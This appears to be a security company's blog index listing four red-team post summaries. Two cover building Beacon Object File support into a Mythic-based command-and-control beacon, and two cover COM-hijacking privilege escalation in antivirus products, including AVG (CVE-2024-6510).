November 27, 2025 – This is the second post in a series of blog posts on how we implemented support for Beacon Object Files (BOFs) into our own command and control (C2) beacon using the Mythic framework. In this second post, we will present some concrete BOF implementations to show how they are used in the wild and how powerful they can be.

Author: Leon Schmidt

Command-and-Control

Beacon Object Files for Mythic – Part 1

November 19, 2025 – This is the first post in a series of blog posts on how we implemented support for Beacon Object Files into our own command and control (C2) beacon using the Mythic framework. In this first post, we will take a look at what Beacon Object Files are, how they work and why they are valuable to us.

Author: Leon Schmidt

Red Teaming

The Key to COMpromise – Part 2

January 29, 2025 – In this post, we will delve into how we exploited trust in AVG Internet Security (CVE-2024-6510) to gain elevated privileges.
But before that, the next section will detail how we overcame an allow-listing mechanism that initially disrupted our COM hijacking attempts.

Author: Alain Rödel and Kolja Grassmann

Red Teaming

The Key to COMpromise – Part 1

January 15, 2025 – In this series of blog posts, we cover how we could exploit five reputable security products to gain SYSTEM privileges with COM hijacking. If you’ve never heard of this, no worries. We introduce all relevant background information, describe our approach to reverse engineering the products’ internals, and explain how we finally exploited the vulnerabilities. We hope to shed some light on this undervalued attack surface.

Author: Alain Rödel and Kolja Grassmann
